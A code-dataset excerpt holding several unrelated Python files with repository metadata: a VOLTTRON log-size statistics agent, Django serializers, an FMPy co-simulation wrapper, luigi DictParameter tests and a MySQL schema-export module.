self.historian_topic = config["historian_topic"]
self.size_delta_list = []
self.file_start_size = None
self.prev_file_size = None
self._scheduled_event = None
@Core.receiver('onstart')
def starting(self, sender, **kwargs):
_log.info("Starting " + self.__class__.__name__ + " agent")
self.publish_analysis()
def publish_analysis(self):
"""
Publishes file's size increment in previous time interval (60 minutes)
with timestamp.
Also publishes standard deviation of file's hourly size differences
every 24 hour.
"""
if self._scheduled_event is not None:
self._scheduled_event.cancel()
if self.prev_file_size is None:
self.prev_file_size = self.get_file_size()
_log.debug("init_file_size = {}".format(self.prev_file_size))
else:
# read file size
curr_file_size = self.get_file_size()
# calculate size delta
size_delta = curr_file_size - self.prev_file_size
self.prev_file_size = curr_file_size
self.size_delta_list.append(size_delta)
headers = {'Date': datetime.datetime.utcnow().isoformat() + 'Z'}
publish_message = {'timestamp': datetime.datetime.utcnow().isoformat() + 'Z',
'log_size_delta': size_delta}
historian_message = [{"log_size_delta ": size_delta},
{"log_size_delta ": {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}}]
if len(self.size_delta_list) == 24:
standard_deviation = statistics.stdev(self.size_delta_list)
publish_message['log_std_dev'] = standard_deviation
historian_message[0]['log_std_dev'] = standard_deviation
historian_message[1]['log_std_dev'] = {'units': 'bytes', 'tz': 'UTC', 'type': 'float'}
_log.debug('publishing message {} with header {} on historian topic {}'
.format(historian_message, headers, self.historian_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.historian_topic, headers = headers,
message=historian_message)
self.size_delta_list = []
_log.debug('publishing message {} on topic {}'.format(publish_message, self.publish_topic))
self.vip.pubsub.publish(peer="pubsub", topic=self.publish_topic,
message=publish_message)
_log.debug('Scheduling next periodic call')
now = get_aware_utc_now()
next_update_time = now + datetime.timedelta(
seconds=self.analysis_interval_sec)
self._scheduled_event = self.core.schedule(
next_update_time, self.publish_analysis)
def get_file_size(self):
try:
return os.path.getsize(self.file_path)
except OSError as e:
_log.error(e)
def main(argv=sys.argv):
"""Main method called by the platform."""
utils.vip_main(log_statistics, identity='platform.logstatisticsagent')
if __name__ == '__main__':
# Entry point for script
try:
sys.exit(main())
except KeyboardInterrupt:
pass
| en | 0.817641 | # -*- coding: utf-8 -*- {{{ # vim: set fenc=utf-8 ft=python sw=4 ts=4 sts=4 et: # # Copyright 2019, Battelle Memorial Institute. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # This material was prepared as an account of work sponsored by an agency of # the United States Government. Neither the United States Government nor the # United States Department of Energy, nor Battelle, nor any of their # employees, nor any jurisdiction or organization that has cooperated in the # development of these materials, makes any warranty, express or # implied, or assumes any legal liability or responsibility for the accuracy, # completeness, or usefulness or any information, apparatus, product, # software, or process disclosed, or represents that its use would not infringe # privately owned rights. Reference herein to any specific commercial product, # process, or service by trade name, trademark, manufacturer, or otherwise # does not necessarily constitute or imply its endorsement, recommendation, or # favoring by the United States Government or any agency thereof, or # Battelle Memorial Institute. The views and opinions of authors expressed # herein do not necessarily state or reflect those of the # United States Government or any agency thereof. # # PACIFIC NORTHWEST NATIONAL LABORATORY operated by # BATTELLE for the UNITED STATES DEPARTMENT OF ENERGY # under Contract DE-AC05-76RL01830 # }}} Load the LogStatisticsAgent agent configuration and returns and instance of the agent created using that configuration. :param config_path: Path to a configuration file. :type config_path: str :returns: LogStatisticsAgent agent instance :rtype: LogStatisticsAgent agent LogStatisticsAgent reads volttron.log file size every hour, compute the size delta from previous hour and publish the difference with timestamp. It also publishes standard deviation every 24 hours. :param config: Configuration dict :type config: dict Example configuration: .. code-block:: python { "file_path" : "/home/volttron/volttron.log", "analysis_interval_sec" : 60, "publish_topic" : "platform/log_statistics", "historian_topic" : "analysis/log_statistics" } Publishes file's size increment in previous time interval (60 minutes) with timestamp. Also publishes standard deviation of file's hourly size differences every 24 hour. # read file size # calculate size delta Main method called by the platform. # Entry point for script | 1.190412 | 1 |
apps/inventory/serializers.py | sseits-skku/its-backend | 0 | 8022 | from rest_framework.serializers import ModelSerializer
from .models import Place, Status, OSType, Stock, ComputerStock
class PlaceSerializer(ModelSerializer):
class Meta:
model = Place
fields = '__all__'
class StatusSerializer(ModelSerializer):
class Meta:
model = Status
fields = '__all__'
class OSTypeSerializer(ModelSerializer):
class Meta:
model = OSType
fields = '__all__'
class StockSerializer(ModelSerializer):
class Meta:
model = Stock
fields = '__all__'
class ComputerStockSerializer(ModelSerializer):
class Meta:
model = ComputerStock
fields = '__all__'
| from rest_framework.serializers import ModelSerializer
from .models import Place, Status, OSType, Stock, ComputerStock
class PlaceSerializer(ModelSerializer):
class Meta:
model = Place
fields = '__all__'
class StatusSerializer(ModelSerializer):
class Meta:
model = Status
fields = '__all__'
class OSTypeSerializer(ModelSerializer):
class Meta:
model = OSType
fields = '__all__'
class StockSerializer(ModelSerializer):
class Meta:
model = Stock
fields = '__all__'
class ComputerStockSerializer(ModelSerializer):
class Meta:
model = ComputerStock
fields = '__all__'
| none | 1 | 2.090784 | 2 |
|
fmpy/cswrapper/__init__.py | CSchulzeTLK/FMPy | 225 | 8023 | <reponame>CSchulzeTLK/FMPy
def add_cswrapper(filename, outfilename=None):
from fmpy import read_model_description, extract, sharedLibraryExtension, platform, __version__
from lxml import etree
import os
from shutil import copyfile, rmtree
if outfilename is None:
outfilename = filename
model_description = read_model_description(filename)
if model_description.fmiVersion != '2.0':
raise Exception("%s is not an FMI 2.0 FMU." % filename)
if model_description.modelExchange is None:
raise Exception("%s does not support Model Exchange." % filename)
unzipdir = extract(filename)
xml = os.path.join(unzipdir, 'modelDescription.xml')
tree = etree.parse(xml)
root = tree.getroot()
# update description
generation_tool = root.attrib.get('generationTool', 'Unknown') + " with FMPy %s Co-Simulation wrapper" % __version__
root.attrib['generationTool'] = generation_tool
# remove any existing <CoSimulation> element
for e in root.findall('CoSimulation'):
root.remove(e)
for i, child in enumerate(root):
if child.tag == 'ModelExchange':
break
model_identifier = '%s_%s_%s' % (model_description.modelExchange.modelIdentifier,
model_description.numberOfContinuousStates,
model_description.numberOfEventIndicators)
e = etree.Element("CoSimulation")
e.attrib['modelIdentifier'] = model_identifier
root.insert(i + 1, e)
tree.write(xml, pretty_print=True, encoding='utf-8')
shared_library = os.path.join(os.path.dirname(__file__), 'cswrapper' + sharedLibraryExtension)
license_file = os.path.join(os.path.dirname(__file__), 'license.txt')
licenses_dir = os.path.join(unzipdir, 'documentation', 'licenses')
if not os.path.isdir(licenses_dir):
os.mkdir(licenses_dir)
copyfile(src=shared_library, dst=os.path.join(unzipdir, 'binaries', platform, model_identifier + sharedLibraryExtension))
copyfile(license_file, os.path.join(unzipdir, 'documentation', 'licenses', 'fmpy-cswrapper.txt'))
create_zip_archive(outfilename, unzipdir)
rmtree(unzipdir, ignore_errors=True)
def create_zip_archive(filename, source_dir):
import zipfile
import os
with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as zf:
base_path = os.path.normpath(source_dir)
for dirpath, dirnames, filenames in os.walk(source_dir):
for name in sorted(dirnames):
path = os.path.normpath(os.path.join(dirpath, name))
zf.write(path, os.path.relpath(path, base_path))
for name in filenames:
path = os.path.normpath(os.path.join(dirpath, name))
if os.path.isfile(path):
zf.write(path, os.path.relpath(path, base_path))
| def add_cswrapper(filename, outfilename=None):
from fmpy import read_model_description, extract, sharedLibraryExtension, platform, __version__
from lxml import etree
import os
from shutil import copyfile, rmtree
if outfilename is None:
outfilename = filename
model_description = read_model_description(filename)
if model_description.fmiVersion != '2.0':
raise Exception("%s is not an FMI 2.0 FMU." % filename)
if model_description.modelExchange is None:
raise Exception("%s does not support Model Exchange." % filename)
unzipdir = extract(filename)
xml = os.path.join(unzipdir, 'modelDescription.xml')
tree = etree.parse(xml)
root = tree.getroot()
# update description
generation_tool = root.attrib.get('generationTool', 'Unknown') + " with FMPy %s Co-Simulation wrapper" % __version__
root.attrib['generationTool'] = generation_tool
# remove any existing <CoSimulation> element
for e in root.findall('CoSimulation'):
root.remove(e)
for i, child in enumerate(root):
if child.tag == 'ModelExchange':
break
model_identifier = '%s_%s_%s' % (model_description.modelExchange.modelIdentifier,
model_description.numberOfContinuousStates,
model_description.numberOfEventIndicators)
e = etree.Element("CoSimulation")
e.attrib['modelIdentifier'] = model_identifier
root.insert(i + 1, e)
tree.write(xml, pretty_print=True, encoding='utf-8')
shared_library = os.path.join(os.path.dirname(__file__), 'cswrapper' + sharedLibraryExtension)
license_file = os.path.join(os.path.dirname(__file__), 'license.txt')
licenses_dir = os.path.join(unzipdir, 'documentation', 'licenses')
if not os.path.isdir(licenses_dir):
os.mkdir(licenses_dir)
copyfile(src=shared_library, dst=os.path.join(unzipdir, 'binaries', platform, model_identifier + sharedLibraryExtension))
copyfile(license_file, os.path.join(unzipdir, 'documentation', 'licenses', 'fmpy-cswrapper.txt'))
create_zip_archive(outfilename, unzipdir)
rmtree(unzipdir, ignore_errors=True)
def create_zip_archive(filename, source_dir):
import zipfile
import os
with zipfile.ZipFile(filename, 'w', zipfile.ZIP_DEFLATED) as zf:
base_path = os.path.normpath(source_dir)
for dirpath, dirnames, filenames in os.walk(source_dir):
for name in sorted(dirnames):
path = os.path.normpath(os.path.join(dirpath, name))
zf.write(path, os.path.relpath(path, base_path))
for name in filenames:
path = os.path.normpath(os.path.join(dirpath, name))
if os.path.isfile(path):
zf.write(path, os.path.relpath(path, base_path)) | en | 0.192361 | # update description # remove any existing <CoSimulation> element | 2.13795 | 2 |
test/dict_parameter_test.py | shouldsee/luigi | 14,755 | 8024 | <gh_stars>1000+
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import unittest, in_parse
import luigi
import luigi.interface
import json
import collections
class DictParameterTask(luigi.Task):
param = luigi.DictParameter()
class DictParameterTest(unittest.TestCase):
_dict = collections.OrderedDict([('username', 'me'), ('password', '<PASSWORD>')])
def test_parse(self):
d = luigi.DictParameter().parse(json.dumps(DictParameterTest._dict))
self.assertEqual(d, DictParameterTest._dict)
def test_serialize(self):
d = luigi.DictParameter().serialize(DictParameterTest._dict)
self.assertEqual(d, '{"username": "me", "password": "<PASSWORD>"}')
def test_parse_and_serialize(self):
inputs = ['{"username": "me", "password": "<PASSWORD>"}', '{"password": "<PASSWORD>", "username": "me"}']
for json_input in inputs:
_dict = luigi.DictParameter().parse(json_input)
self.assertEqual(json_input, luigi.DictParameter().serialize(_dict))
def test_parse_interface(self):
in_parse(["DictParameterTask", "--param", '{"username": "me", "password": "<PASSWORD>"}'],
lambda task: self.assertEqual(task.param, DictParameterTest._dict))
def test_serialize_task(self):
t = DictParameterTask(DictParameterTest._dict)
self.assertEqual(str(t), 'DictParameterTask(param={"username": "me", "password": "<PASSWORD>"})')
def test_parse_invalid_input(self):
self.assertRaises(ValueError, lambda: luigi.DictParameter().parse('{"invalid"}'))
def test_hash_normalize(self):
self.assertRaises(TypeError, lambda: hash(luigi.DictParameter().parse('{"a": {"b": []}}')))
a = luigi.DictParameter().normalize({"a": [{"b": []}]})
b = luigi.DictParameter().normalize({"a": [{"b": []}]})
self.assertEqual(hash(a), hash(b))
| # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import unittest, in_parse
import luigi
import luigi.interface
import json
import collections
class DictParameterTask(luigi.Task):
param = luigi.DictParameter()
class DictParameterTest(unittest.TestCase):
_dict = collections.OrderedDict([('username', 'me'), ('password', '<PASSWORD>')])
def test_parse(self):
d = luigi.DictParameter().parse(json.dumps(DictParameterTest._dict))
self.assertEqual(d, DictParameterTest._dict)
def test_serialize(self):
d = luigi.DictParameter().serialize(DictParameterTest._dict)
self.assertEqual(d, '{"username": "me", "password": "<PASSWORD>"}')
def test_parse_and_serialize(self):
inputs = ['{"username": "me", "password": "<PASSWORD>"}', '{"password": "<PASSWORD>", "username": "me"}']
for json_input in inputs:
_dict = luigi.DictParameter().parse(json_input)
self.assertEqual(json_input, luigi.DictParameter().serialize(_dict))
def test_parse_interface(self):
in_parse(["DictParameterTask", "--param", '{"username": "me", "password": "<PASSWORD>"}'],
lambda task: self.assertEqual(task.param, DictParameterTest._dict))
def test_serialize_task(self):
t = DictParameterTask(DictParameterTest._dict)
self.assertEqual(str(t), 'DictParameterTask(param={"username": "me", "password": "<PASSWORD>"})')
def test_parse_invalid_input(self):
self.assertRaises(ValueError, lambda: luigi.DictParameter().parse('{"invalid"}'))
def test_hash_normalize(self):
self.assertRaises(TypeError, lambda: hash(luigi.DictParameter().parse('{"a": {"b": []}}')))
a = luigi.DictParameter().normalize({"a": [{"b": []}]})
b = luigi.DictParameter().normalize({"a": [{"b": []}]})
self.assertEqual(hash(a), hash(b)) | en | 0.840663 | # -*- coding: utf-8 -*- # # Copyright 2012-2015 Spotify AB # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # | 2.415882 | 2 |
echoscope/source/mysql_source.py | treeyh/echoscope | 1 | 8025 | # -*- coding: UTF-8 -*-
import logging
from typing import List
from echoscope.config import config
from echoscope.util import mysql_util, str_util, log_util
from echoscope.model import ds_model, config_model
from echoscope.source import source
class MysqlSource(source.Source):
def __init__(self):
self.excludesDb = ['information_schema', 'performance_schema', 'mysql', 'sys', 'test']
def export_model(self, conf: config_model.DataSourceConfig) -> ds_model.DataSourceModel:
mysqlUtil = mysql_util.get_mysql_util(
host=conf.host, port=conf.port, user=conf.user, passwd=<PASSWORD>, db=conf.db, charset=conf.charset)
ver = self.get_db_version(mysqlUtil)
if ver == '':
logging.error(' mysql conn fail. ')
return
dsm = ds_model.DataSourceModel(
name='%s:%d' % (conf.host, conf.port), dbType=config.DsMysql, version=ver)
dsm.dbs = self.get_export_dbs(mysqlUtil, conf.includes, conf.excludes)
dsm = self.fill_table_fields(mysqlUtil, dsm)
return dsm
def get_db_version(self, conn: mysql_util.MysqlUtil) -> str:
"""获取mysql版本
Args:
conn (mysql_util.MysqlUtil): [description]
Returns:
str: [description]
"""
sql = 'select version() as ver from dual'
cols = ['ver']
ver = conn.find_one(sql, (), cols)
return '' if ver == None else str_util.format_bytes_to_str(ver.get('ver', ''))
def get_export_dbs(self, conn: mysql_util.MysqlUtil, includes: List[str] = [], excludes: List[str] = []) -> List[ds_model.DbModel]:
"""获取需要导出结构的数据库列表
Args:
conn (mysql_util.MysqlUtil): 数据库连接
includes (List[str], optional): 需要包含的数据库列表. Defaults to [].
excludes (List[str], optional): 需要排除的数据库列表. Defaults to [].
Returns:
List[ds_model.DbModel]: 需要导出的数据库列表
"""
sql = 'select SCHEMA_NAME AS db_name, DEFAULT_CHARACTER_SET_NAME as charset, DEFAULT_COLLATION_NAME as collation_name from `information_schema`.SCHEMATA '
cols = ['db_name', 'charset', 'collation_name']
data = conn.find_all(sql, (), cols)
dbs = []
for d in data:
db_name = str_util.format_bytes_to_str(d['db_name'])
if db_name in self.excludesDb or db_name in excludes:
# 需要过滤
continue
if len(includes) > 0 and db_name not in includes:
# 不包含在include中
continue
charset = str_util.format_bytes_to_str(d['charset'])
collation_name = str_util.format_bytes_to_str(d['collation_name'])
dbModel = ds_model.DbModel(
name=db_name, charset=charset, collation_name=collation_name)
dbs.append(dbModel)
return dbs
def fill_table_fields(self, conn: mysql_util.MysqlUtil, dsModel: ds_model.DataSourceModel) -> ds_model.DataSourceModel:
"""获取数据库中的表信息
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dsModel (ds_model.DataSourceModel): 数据源,包含数据库列表
Returns:
ds_model.DataSourceModel: 数据源
"""
sql = ''' select TABLE_NAME, `ENGINE`, TABLE_COLLATION, TABLE_COMMENT from information_schema.`TABLES` where TABLE_SCHEMA = %s and TABLE_TYPE = 'BASE TABLE' '''
cols = ['TABLE_NAME', 'ENGINE', 'TABLE_COLLATION', 'TABLE_COMMENT']
for db in dsModel.dbs:
data = conn.find_all(sql, (db.name, ), cols)
tables: ds_model.TableModel = []
for d in data:
tableName = str_util.format_bytes_to_str(d['TABLE_NAME'])
comment = str_util.format_bytes_to_str(d['TABLE_COMMENT'])
collation_name = str_util.format_bytes_to_str(d['TABLE_COLLATION'])
engine = str_util.format_bytes_to_str(d['ENGINE'])
table = ds_model.TableModel(
name=tableName, comment=comment, collation_name=collation_name, engine=engine)
logging.info('load table:%s fields.' % tableName)
table.fields = self.get_fields(conn, db.name, tableName)
table.create_script = self.get_create_script(conn, db.name, tableName)
tables.append(table)
db.tables = tables
return dsModel
def get_create_script(self, conn: mysql_util.MysqlUtil, dbName: str, tableName: str) -> str:
"""获取表的创建脚本
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dbName (str): 数据库名称
tableName (str): 表名称
Returns:
str: 创建脚本
"""
sql = ''' SHOW CREATE TABLE `%s`.`%s` ''' % (dbName, tableName)
cols = ['Table', 'Create Table']
data = conn.find_one(sql, (), cols)
return '' if data == None else str_util.format_bytes_to_str(data.get('Create Table', ''))
def get_fields(self, conn: mysql_util.MysqlUtil, dbName: str, tableName: str) -> List[ds_model.FieldModel]:
"""获取数据表中列信息
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dbName (str): 数据库名
tableName (str): 表名
Returns:
List[ds_model.FieldModel]: 列列表
"""
sql = ''' select TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, ORDINAL_POSITION, COLUMN_DEFAULT, IS_NULLABLE, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH, NUMERIC_PRECISION, NUMERIC_SCALE, CHARACTER_SET_NAME, COLLATION_NAME, COLUMN_TYPE, COLUMN_KEY, EXTRA, COLUMN_COMMENT from information_schema.`columns` where TABLE_SCHEMA = %s and TABLE_NAME = %s ORDER BY TABLE_SCHEMA DESC, TABLE_NAME DESC, ORDINAL_POSITION ASC '''
cols = ['TABLE_SCHEMA', 'TABLE_NAME', 'COLUMN_NAME', 'ORDINAL_POSITION', 'COLUMN_DEFAULT',
'IS_NULLABLE', 'DATA_TYPE', 'CHARACTER_MAXIMUM_LENGTH', 'NUMERIC_PRECISION', 'NUMERIC_SCALE',
'CHARACTER_SET_NAME', 'COLLATION_NAME', 'COLUMN_TYPE', 'COLUMN_KEY', 'EXTRA', 'COLUMN_COMMENT']
data = conn.find_all(sql, (dbName, tableName, ), cols)
fields = []
for d in data:
fname = str_util.format_bytes_to_str(d['COLUMN_NAME'])
ftype = str_util.format_bytes_to_str(d['DATA_TYPE'])
column_type = str_utils.format_bytes_to_str(d['COLUMN_TYPE'])
length = str_util.format_bytes_to_str(
d['CHARACTER_MAXIMUM_LENGTH']) if d['CHARACTER_MAXIMUM_LENGTH'] != None else str_util.format_bytes_to_str(d['NUMERIC_PRECISION'])
scale = str_util.format_bytes_to_str(d['NUMERIC_SCALE'])
# on update CURRENT_TIMESTAMP
default = str_util.format_bytes_to_str(d['COLUMN_DEFAULT'])
ext = str_util.format_bytes_to_str(d['EXTRA'])
if default == 'CURRENT_TIMESTAMP':
if 'on update CURRENT_TIMESTAMP' in ext:
default = 'update_time'
else:
default = 'create_time'
nullFlag = str_util.format_bytes_to_str(d['IS_NULLABLE'])
comment = str_util.format_bytes_to_str(d['COLUMN_COMMENT'])
charset = str_util.format_bytes_to_str(d['CHARACTER_SET_NAME'])
collation_name = str_util.format_bytes_to_str(d['COLLATION_NAME'])
indexFlag = 0
column_key = str_util.format_bytes_to_str(d['COLUMN_KEY'])
if column_key == 'PRI':
indexFlag = 1
elif column_key == 'UNI':
indexFlag = 3
elif column_key == 'MUL':
indexFlag = 2
indexName = ''
autoInc = False
if 'auto_increment' in ext:
autoInc = True
field = ds_model.FieldModel(name=fname, ftype=ftype, length=length, scale=scale, default=default, nullFlag=nullFlag,
comment=comment, charset=charset, collation_name=collation_name, indexFlag=indexFlag, indexName=indexName, autoInc=autoInc)
fields.append(field)
return fields
| # -*- coding: UTF-8 -*-
import logging
from typing import List
from echoscope.config import config
from echoscope.util import mysql_util, str_util, log_util
from echoscope.model import ds_model, config_model
from echoscope.source import source
class MysqlSource(source.Source):
def __init__(self):
self.excludesDb = ['information_schema', 'performance_schema', 'mysql', 'sys', 'test']
def export_model(self, conf: config_model.DataSourceConfig) -> ds_model.DataSourceModel:
mysqlUtil = mysql_util.get_mysql_util(
host=conf.host, port=conf.port, user=conf.user, passwd=<PASSWORD>, db=conf.db, charset=conf.charset)
ver = self.get_db_version(mysqlUtil)
if ver == '':
logging.error(' mysql conn fail. ')
return
dsm = ds_model.DataSourceModel(
name='%s:%d' % (conf.host, conf.port), dbType=config.DsMysql, version=ver)
dsm.dbs = self.get_export_dbs(mysqlUtil, conf.includes, conf.excludes)
dsm = self.fill_table_fields(mysqlUtil, dsm)
return dsm
def get_db_version(self, conn: mysql_util.MysqlUtil) -> str:
"""获取mysql版本
Args:
conn (mysql_util.MysqlUtil): [description]
Returns:
str: [description]
"""
sql = 'select version() as ver from dual'
cols = ['ver']
ver = conn.find_one(sql, (), cols)
return '' if ver == None else str_util.format_bytes_to_str(ver.get('ver', ''))
def get_export_dbs(self, conn: mysql_util.MysqlUtil, includes: List[str] = [], excludes: List[str] = []) -> List[ds_model.DbModel]:
"""获取需要导出结构的数据库列表
Args:
conn (mysql_util.MysqlUtil): 数据库连接
includes (List[str], optional): 需要包含的数据库列表. Defaults to [].
excludes (List[str], optional): 需要排除的数据库列表. Defaults to [].
Returns:
List[ds_model.DbModel]: 需要导出的数据库列表
"""
sql = 'select SCHEMA_NAME AS db_name, DEFAULT_CHARACTER_SET_NAME as charset, DEFAULT_COLLATION_NAME as collation_name from `information_schema`.SCHEMATA '
cols = ['db_name', 'charset', 'collation_name']
data = conn.find_all(sql, (), cols)
dbs = []
for d in data:
db_name = str_util.format_bytes_to_str(d['db_name'])
if db_name in self.excludesDb or db_name in excludes:
# 需要过滤
continue
if len(includes) > 0 and db_name not in includes:
# 不包含在include中
continue
charset = str_util.format_bytes_to_str(d['charset'])
collation_name = str_util.format_bytes_to_str(d['collation_name'])
dbModel = ds_model.DbModel(
name=db_name, charset=charset, collation_name=collation_name)
dbs.append(dbModel)
return dbs
def fill_table_fields(self, conn: mysql_util.MysqlUtil, dsModel: ds_model.DataSourceModel) -> ds_model.DataSourceModel:
"""获取数据库中的表信息
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dsModel (ds_model.DataSourceModel): 数据源,包含数据库列表
Returns:
ds_model.DataSourceModel: 数据源
"""
sql = ''' select TABLE_NAME, `ENGINE`, TABLE_COLLATION, TABLE_COMMENT from information_schema.`TABLES` where TABLE_SCHEMA = %s and TABLE_TYPE = 'BASE TABLE' '''
cols = ['TABLE_NAME', 'ENGINE', 'TABLE_COLLATION', 'TABLE_COMMENT']
for db in dsModel.dbs:
data = conn.find_all(sql, (db.name, ), cols)
tables: ds_model.TableModel = []
for d in data:
tableName = str_util.format_bytes_to_str(d['TABLE_NAME'])
comment = str_util.format_bytes_to_str(d['TABLE_COMMENT'])
collation_name = str_util.format_bytes_to_str(d['TABLE_COLLATION'])
engine = str_util.format_bytes_to_str(d['ENGINE'])
table = ds_model.TableModel(
name=tableName, comment=comment, collation_name=collation_name, engine=engine)
logging.info('load table:%s fields.' % tableName)
table.fields = self.get_fields(conn, db.name, tableName)
table.create_script = self.get_create_script(conn, db.name, tableName)
tables.append(table)
db.tables = tables
return dsModel
def get_create_script(self, conn: mysql_util.MysqlUtil, dbName: str, tableName: str) -> str:
"""获取表的创建脚本
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dbName (str): 数据库名称
tableName (str): 表名称
Returns:
str: 创建脚本
"""
sql = ''' SHOW CREATE TABLE `%s`.`%s` ''' % (dbName, tableName)
cols = ['Table', 'Create Table']
data = conn.find_one(sql, (), cols)
return '' if data == None else str_util.format_bytes_to_str(data.get('Create Table', ''))
def get_fields(self, conn: mysql_util.MysqlUtil, dbName: str, tableName: str) -> List[ds_model.FieldModel]:
"""获取数据表中列信息
Args:
conn (mysql_util.MysqlUtil): 数据库连接
dbName (str): 数据库名
tableName (str): 表名
Returns:
List[ds_model.FieldModel]: 列列表
"""
sql = ''' select TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, ORDINAL_POSITION, COLUMN_DEFAULT, IS_NULLABLE, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH, NUMERIC_PRECISION, NUMERIC_SCALE, CHARACTER_SET_NAME, COLLATION_NAME, COLUMN_TYPE, COLUMN_KEY, EXTRA, COLUMN_COMMENT from information_schema.`columns` where TABLE_SCHEMA = %s and TABLE_NAME = %s ORDER BY TABLE_SCHEMA DESC, TABLE_NAME DESC, ORDINAL_POSITION ASC '''
cols = ['TABLE_SCHEMA', 'TABLE_NAME', 'COLUMN_NAME', 'ORDINAL_POSITION', 'COLUMN_DEFAULT',
'IS_NULLABLE', 'DATA_TYPE', 'CHARACTER_MAXIMUM_LENGTH', 'NUMERIC_PRECISION', 'NUMERIC_SCALE',
'CHARACTER_SET_NAME', 'COLLATION_NAME', 'COLUMN_TYPE', 'COLUMN_KEY', 'EXTRA', 'COLUMN_COMMENT']
data = conn.find_all(sql, (dbName, tableName, ), cols)
fields = []
for d in data:
fname = str_util.format_bytes_to_str(d['COLUMN_NAME'])
ftype = str_util.format_bytes_to_str(d['DATA_TYPE'])
column_type = str_utils.format_bytes_to_str(d['COLUMN_TYPE'])
length = str_util.format_bytes_to_str(
d['CHARACTER_MAXIMUM_LENGTH']) if d['CHARACTER_MAXIMUM_LENGTH'] != None else str_util.format_bytes_to_str(d['NUMERIC_PRECISION'])
scale = str_util.format_bytes_to_str(d['NUMERIC_SCALE'])
# on update CURRENT_TIMESTAMP
default = str_util.format_bytes_to_str(d['COLUMN_DEFAULT'])
ext = str_util.format_bytes_to_str(d['EXTRA'])
if default == 'CURRENT_TIMESTAMP':
if 'on update CURRENT_TIMESTAMP' in ext:
default = 'update_time'
else:
default = 'create_time'
nullFlag = str_util.format_bytes_to_str(d['IS_NULLABLE'])
comment = str_util.format_bytes_to_str(d['COLUMN_COMMENT'])
charset = str_util.format_bytes_to_str(d['CHARACTER_SET_NAME'])
collation_name = str_util.format_bytes_to_str(d['COLLATION_NAME'])
indexFlag = 0
column_key = str_util.format_bytes_to_str(d['COLUMN_KEY'])
if column_key == 'PRI':
indexFlag = 1
elif column_key == 'UNI':
indexFlag = 3
elif column_key == 'MUL':
indexFlag = 2
indexName = ''
autoInc = False
if 'auto_increment' in ext:
autoInc = True
field = ds_model.FieldModel(name=fname, ftype=ftype, length=length, scale=scale, default=default, nullFlag=nullFlag,
comment=comment, charset=charset, collation_name=collation_name, indexFlag=indexFlag, indexName=indexName, autoInc=autoInc)
fields.append(field)
return fields
| zh | 0.331683 | # -*- coding: UTF-8 -*- 获取mysql版本 Args: conn (mysql_util.MysqlUtil): [description] Returns: str: [description] 获取需要导出结构的数据库列表 Args: conn (mysql_util.MysqlUtil): 数据库连接 includes (List[str], optional): 需要包含的数据库列表. Defaults to []. excludes (List[str], optional): 需要排除的数据库列表. Defaults to []. Returns: List[ds_model.DbModel]: 需要导出的数据库列表 # 需要过滤 # 不包含在include中 获取数据库中的表信息 Args: conn (mysql_util.MysqlUtil): 数据库连接 dsModel (ds_model.DataSourceModel): 数据源,包含数据库列表 Returns: ds_model.DataSourceModel: 数据源 select TABLE_NAME, `ENGINE`, TABLE_COLLATION, TABLE_COMMENT from information_schema.`TABLES` where TABLE_SCHEMA = %s and TABLE_TYPE = 'BASE TABLE' 获取表的创建脚本 Args: conn (mysql_util.MysqlUtil): 数据库连接 dbName (str): 数据库名称 tableName (str): 表名称 Returns: str: 创建脚本 SHOW CREATE TABLE `%s`.`%s` 获取数据表中列信息 Args: conn (mysql_util.MysqlUtil): 数据库连接 dbName (str): 数据库名 tableName (str): 表名 Returns: List[ds_model.FieldModel]: 列列表 select TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME, ORDINAL_POSITION, COLUMN_DEFAULT, IS_NULLABLE, DATA_TYPE, CHARACTER_MAXIMUM_LENGTH, NUMERIC_PRECISION, NUMERIC_SCALE, CHARACTER_SET_NAME, COLLATION_NAME, COLUMN_TYPE, COLUMN_KEY, EXTRA, COLUMN_COMMENT from information_schema.`columns` where TABLE_SCHEMA = %s and TABLE_NAME = %s ORDER BY TABLE_SCHEMA DESC, TABLE_NAME DESC, ORDINAL_POSITION ASC # on update CURRENT_TIMESTAMP | 2.173562 | 2 |
lib/XChemPANDDA.py | graeme-winter/XChemExplorer | 2 | 8026 | # last edited: 10/08/2017, 10:25
import os, sys, glob, subprocess
from datetime import datetime
